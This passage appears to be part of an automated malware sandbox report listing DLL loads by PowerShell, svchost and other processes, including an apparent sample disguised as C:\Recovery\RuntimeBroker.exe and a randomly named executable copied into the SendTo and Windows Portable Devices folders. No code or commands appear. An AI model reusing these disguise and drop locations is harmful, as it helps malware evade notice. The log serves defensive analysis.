                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ktmw32.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winmmbase.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mmdevapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: devobj.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ksuser.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: avrt.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: audioses.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: powrprof.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: umpdc.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: msacm32.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: midimap.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dpapi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
